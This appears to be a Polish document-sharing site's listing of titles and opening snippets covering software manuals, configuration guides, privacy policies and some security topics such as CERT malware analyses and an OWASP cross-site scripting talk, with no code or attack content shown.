ZPKSoft WDoradca 1. Wstęp 2. Architektura 3. Instalacja 4. Konfiguracja 5. Jak to działa 6. Licencja 1. Wstęp ZPKSoft WDoradca jest technologią dostępu przeglądarkowego do zasobów systemu ZPKSoft Doradca.
Bardziej szczegółowoAnaliza malware Remote Administration Tool (RAT) DarkComet BeSTi@
Analiza malware Remote Administration Tool (RAT) DarkComet BeSTi@ 24 marzec, 2014 Wstęp Tydzień temu do wielu skrzynek pocztowych w Polsce trafił email z linkiem do pliku podszywającego się pod nową aktualizację
Bardziej szczegółowoDodawanie stron do zakładek
Dodawanie stron do zakładek Aby dodać adres strony do zakładek otwieramy odpowiednią stronę a następnie wybieramy ikonę Dodaj zakładkę Po wybraniu ikony otworzy się okno umożliwiające dodanie adresy strony
Bardziej szczegółowoDokumentacja SMS przez FTP
Dokumentacja SMS przez FTP 1 Wprowadzenie... 2 Właściwości plików... 3 Tworzenie konfiguracji w Panelu Klienta... 4 Raporty doręczeń... 5 Historia zmian... 6 2 Wprowadzenie Usługa wysyłki SMS przez FTP
Bardziej szczegółowoPełna specyfikacja pakietów Mail Cloud
Pełna specyfikacja pakietów Powierzchnia dyskowa W ramach poczty dostępna jest powierzchnia dyskowa od 25 GB. Można nią zarządzać indywidualnie w ramach konta pocztowego. Liczba kont e-mail W ramach poczty
Bardziej szczegółowoAnaliza malware Keylogger ispy
Analiza malware Keylogger ispy Instalacja złośliwego oprogramowania W październiku na skrzynkę funkcyjną CERT Orange Polska otrzymaliśmy przysłany przez użytkownika mail z podejrzanym załącznikiem. Jeśli
Bardziej szczegółowoBezpieczeństwo IT w środowisku uczelni
Bezpieczeństwo IT w środowisku uczelni Teleinformatica - Wide Area Networking & Security (Grupa SECURITY.PL) Warszawa, 25 kwietnia 2017 O czym będę mówił? Bezpieczeństwo IT specyfika środowiska akademickiego
Bardziej szczegółowoBANK SPÓŁDZIELCZY PA-CO-BANK W PABIANICACH. Jak w bezpieczny i wygodny sposób korzystać z bankowości elektronicznej
BANK SPÓŁDZIELCZY PA-CO-BANK W PABIANICACH Jak w bezpieczny i wygodny sposób korzystać z bankowości elektronicznej Co to jest bankowość elektroniczna i jak jest zbudowana: Zasady bezpiecznego korzystania
Bardziej szczegółowoKrajowe Sympozjum Telekomunikacji i Teleinformatyki KSTiT 2007. Autorzy: Tomasz Piotrowski Szczepan Wójcik Mikołaj Wiśniewski Wojciech Mazurczyk
Bezpieczeństwo usługi VoIP opartej na systemie Asterisk Krajowe Sympozjum Telekomunikacji i Teleinformatyki KSTiT 2007 Autorzy: Tomasz Piotrowski Szczepan Wójcik Mikołaj Wiśniewski Wojciech Mazurczyk Bydgoszcz,
Bardziej szczegółowoPosiada (TAK / NIE. Zrzut ekranu. Opis funkcji
Załącznik nr 1b do SIWZ TABELA FUNKCJONALNOŚCI UWAGA: Jeśli funkcjonalność, dla której wymagane jest potwierdzenie zrzutem ekranu wymusza wykonanie kliku zrzutów ekranu, konieczne jest aby każdy taki zrzut
Bardziej szczegółowoKonfiguracja współpracy urządzeń mobilnych (bonowników).
Konfiguracja współpracy urządzeń mobilnych (bonowników). Współpracę Bistro z bonownikami można realizować na dwa sposoby: poprzez udostępnienie folderu w Windows albo za pomocą serwera ftp. 1. Współpraca
Bardziej szczegółowoAplikacja Novell Filr 2.0 Web Szybki start
Aplikacja Novell Filr 2.0 Web Szybki start Luty 2016 r. Szybki start Niniejszy dokument pomaga zapoznać się z systemem Novell Filr oraz ułatwia zrozumienie najistotniejszych pojęć i zadań. Informacje o
Bardziej szczegółowo2014 Electronics For Imaging. Informacje zawarte w niniejszej publikacji podlegają postanowieniom opisanym w dokumencie Uwagi prawne dotyczącym tego
2014 Electronics For Imaging. Informacje zawarte w niniejszej publikacji podlegają postanowieniom opisanym w dokumencie Uwagi prawne dotyczącym tego produktu. 23 czerwca 2014 Spis treści 3 Spis treści...5
Bardziej szczegółowoKONFIGURACJA PRZEGLĄDAREK. Poniższa konfiguracja dedykowana jest dla Bankowości Internetowej SGB
KONFIGURACJA PRZEGLĄDAREK Poniższa konfiguracja dedykowana jest dla Bankowości Internetowej SGB Spis treści Konfiguracja przeglądarki Internet Explorer 8.0... 2 Konfiguracja przeglądarki Internet Explorer
Bardziej szczegółowoAM_Student. Instrukcja konfiguracji połączenia do studenckiej sieci bezprzewodowej Akademii Morskiej w Szczecinie
Wersja: 2010-09-27 AM_Student Instrukcja konfiguracji połączenia do studenckiej sieci bezprzewodowej Akademii Morskiej w Szczecinie Kontakt ws. problemów z siecią: akademik@am.szczecin.pl Kontakt ws. problemów
Bardziej szczegółowoPOLITYKA PRYWATNOŚCI TRANSMISJEONLINE
TransmisjeOnline POLITYKA PRYWATNOŚCI TRANSMISJEONLINE Niniejsza Polityka Prywatności stanowi integralną część Regulaminu Platformy TransmisjeOnline. Definicje pojęć użytych w niniejszej Polityce Prywatności
Bardziej szczegółowoWysyłanie pliku na serwer. Plik na serwerze.
Wysyłanie pliku na serwer Dzięki PHP możemy w łatwy i przyjemny sposób obsłużyć pliki uploadowane na serwer. Jednak, by prawidłowo wysłać plik, niezbędny będzie odpowiedni formularz HTML. Poniżej przedstawię
Bardziej szczegółowoOWASP OWASP. The OWASP Foundation http://www.owasp.org. Cross-Site Scripting. Ryzyko do zaakceptowania? Warszawa, 27 stycznia 2011 Michał Kurek
Cross-Site Scripting Ryzyko do zaakceptowania? Warszawa, 27 stycznia 2011 Michał Kurek Copyright The Foundation Permission is granted to copy, distribute and/or modify this document under the terms of
Bardziej szczegółowoKlient poczty elektronicznej - Thunderbird
Klient poczty elektronicznej - Thunderbird Wstęp Wstęp Klient poczty elektronicznej, to program który umożliwia korzystanie z poczty bez konieczności logowania się na stronie internetowej. Za jego pomocą
Bardziej szczegółowoSynchroniczne wprowadzanie kontrahentów - SWK Moduł VBA do Symfonia FK Forte.
Synchroniczne wprowadzanie kontrahentów - SWK Moduł VBA do Symfonia FK Forte. Autor: DAMAL Grupa Dr IT Data utworzenia: 2009-10-15 Ostatnia zmiana: 2012-11-04 Wersja: 1.4 1. Opis rozwiązania Moduł Synchroniczne
Bardziej szczegółowoForte Zarządzanie Produkcją Instalacja i konfiguracja. Wersja B
Forte Zarządzanie Produkcją Instalacja i konfiguracja Wersja 2013.1.B Forte Zarządzanie Produkcją - Instalacja i konfiguracja Strona 2 z 13 SPIS TREŚCI 1 Instalacja i konfiguracja Forte Zarządzanie Produkcją...
Bardziej szczegółowoP R O C E D U R A P O D Ł Ą C Z E N I A S Y S T E M U D Z I E D Z I N O W E G O D O C S I Z S
P R O C E D U R A P O D Ł Ą C Z E N I A S Y S T E M U D Z I E D Z I N O W E G O 5 0 0 + D O C S I Z S Niniejsza procedura opisuje proces podłączenia systemu dziedzinowego jednostki terenowej (JT) z podobszaru
Bardziej szczegółowoKonfiguracja poczty IMO dla urządzeń mobilnych z systemem ios oraz Android.
Konfiguracja poczty IMO dla urządzeń mobilnych z systemem ios oraz Android. Konfiguracja programu pocztowego dla urządzeń z systemem Android. W zależności od marki telefonu, użytej nakładki systemowej
Bardziej szczegółowoZadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat protokołu http.
T: Konfiguracja usługi HTTP w systemie Windows. Zadanie1: Odszukaj w serwisie internetowym Wikipedii informacje na temat protokołu http. HTTP (ang. Hypertext Transfer Protocol) protokół transferu plików
Bardziej szczegółowoDodawanie stron do zakładek
Dodawanie stron do zakładek Aby dodać adres strony do zakładek otwieramy odpowiednią stronę a następnie wybieramy ikonę Dodaj zakładkę Po wybraniu ikony otworzy się okno umożliwiające dodanie adresy strony
Bardziej szczegółowoE-commerce. Genialnie proste tworzenie serwisów w PHP i MySQL.
E-commerce. Genialnie proste tworzenie serwisów w PHP i MySQL. Autor: Larry Ullman Poznaj zasady wirtualnego handlu i zarabiaj prawdziwe pieniądze Jak stworzyć doskonałą witrynę sklepu internetowego? Jak
Bardziej szczegółowoSMB protokół udostępniania plików i drukarek
SMB protokół udostępniania plików i drukarek Początki protokołu SMB sięgają połowy lat 80., kiedy to w firmie IBM opracowano jego wczesną wersję (IBM PC Network SMB Protocol). W kolejnych latach protokół
Bardziej szczegółowoKORZYSTANIE Z BAZY DANYCH UpToDate
KORZYSTANIE Z BAZY DANYCH UpToDate 1 KORZYSTANIE Z BAZY DANYCH UpToDate 1. Wejdź na stronę Biblioteki Głównej Uniwersytetu Medycznego w Lublinie: http://www.biblioteka.umlub.pl 2. W ZASOBY kliknij na Zdalny
Bardziej szczegółowoNajczęściej występujące problemy z instalacją i konfiguracją i ich rozwiązania.
Najczęściej występujące problemy z instalacją i konfiguracją i ich rozwiązania. Q. Jak uruchomić instalator? A. Trzeba nadać instalatorowi atrybut 'wykonywalny'. Można to zrobić wydając polecenie `chmod
Bardziej szczegółowoSpecyfikacja audytu informatycznego Urzędu Miasta Lubań
Specyfikacja audytu informatycznego Urzędu Miasta Lubań I. Informacje wstępne Przedmiotem zamówienia jest wykonanie audytu informatycznego dla Urzędu Miasta Lubań składającego się z: 1. Audytu bezpieczeństwa
Bardziej szczegółowoPrzewodnik Google Cloud Print
Przewodnik Google Cloud Print Wersja 0 POL Definicje oznaczeń W niniejszym podręczniku użytkownika zastosowano następujący styl uwag: Informacje dotyczą postępowania w różnego rodzaju sytuacjach oraz zależności
Bardziej szczegółowoPOLITYKA BEZPIECZEŃSTWA w zakresie ochrony danych osobowych w ramach serwisu zgloszenia24.pl
POLITYKA BEZPIECZEŃSTWA w zakresie ochrony danych osobowych w ramach serwisu zgloszenia24.pl SPIS TREŚCI I. POSTANOWIENIA OGÓLNE... 2 II. DEFINICJA BEZPIECZEŃSTWA INFORMACJI... 2 III. ZAKRES STOSOWANIA...
Bardziej szczegółowoAnaliza możliwości złośliwego oprogramowania vjw0rm w kampanii phishingowej PayU
Warszawa, 16.03.2016 Analiza możliwości złośliwego oprogramowania vjw0rm w kampanii phishingowej PayU CERT OPL, Analiza vjw0rm; Autor: Iwo Graj Strona 1 z 14 W pierwszej połowie marca w polskim internecie
Bardziej szczegółowoInstrukcja użytkownika
Instrukcja użytkownika Zandro 1.5.5 1 Metryka dokumentu Autor: Tomasz Krówczyński Liczba stron: 14 Data utworzenia: 21-07-2014 Rewizja: 67 HISTORIA ZMIAN Data Autor Wersja Zmiany 21-07-2014 Tomasz Krówczyński
Bardziej szczegółowoClient-side Hacking - wprowadzenie w tematykę ataków na klienta. Radosław Wal radoslaw.wal@clico.pl
Client-side Hacking - wprowadzenie w tematykę ataków na klienta Radosław Wal radoslaw.wal@clico.pl Plan wystąpienia Wprowadzenie Statystyki incydentów bezpieczeństwa Typowe zagrożenia Client-side Minimalne
Bardziej szczegółowoTelnet. Telnet jest najstarszą i najbardziej elementarną usługą internetową.
Telnet Telnet jest najstarszą i najbardziej elementarną usługą internetową. Telnet standard protokołu komunikacyjnego używanego w sieciach komputerowych do obsługi odległego terminala w architekturze klient-serwer.
Bardziej szczegółowoSkonfigurowanie usług katalogowych Active Directory (AD)
Skonfigurowanie usług katalogowych Active Directory (AD) W niniejszym przykładzie zademonstrowane zostanie zainstalowanie na serwerze usług katalogowych Active Directory obsługujących lokalną domenę o
Bardziej szczegółowoPełna specyfikacja pakietów Mail Cloud
Pełna specyfikacja pakietów Powierzchnia dyskowa W ramach poczty dostępna jest powierzchnia dyskowa od 50 GB. Można nią zarządzać indywidualnie w ramach konta pocztowego. Liczba kont e-mail W ramach poczty
Bardziej szczegółowoSzczegółowa specyfikacja funkcjonalności zamawianego oprogramowania.
Szczegółowa specyfikacja funkcjonalności zamawianego oprogramowania. Założenia projektowe systemu NETDOC. część 1: założenia ogólne i funkcjonalność rdzenia systemu Założenia ogólne Celem projektu jest
Bardziej szczegółowoPOLITYKA PRYWATNOŚCI
POLITYKA PRYWATNOŚCI Postanowienia ogólne 1. Niniejsza polityka prywatności i wykorzystania plików cookies jest sporządzona przez 4Mobility S.A., określa ogólne zasady dotyczące gromadzenia, przetwarzania
Bardziej szczegółowoProblemy techniczne. Jak umieszczać pliki na serwerze FTP?
Problemy techniczne Jak umieszczać pliki na serwerze FTP? Użytkownicy programów firmy VULCAN, korzystający z porad serwisu oprogramowania, proszeni są czasami o udostępnienie różnych plików. Pliki te można
Bardziej szczegółowoKomentarz technik teleinformatyk 312[02]-06 Czerwiec 2009
Strona 1 z 14 Strona 2 z 14 Strona 3 z 14 W pracy egzaminacyjnej podlegały ocenie: I. Tytuł pracy egzaminacyjnej. II. Założenia wynikające z treści zadania i załączonej dokumentacji. III. Wykaz działań
Bardziej szczegółowo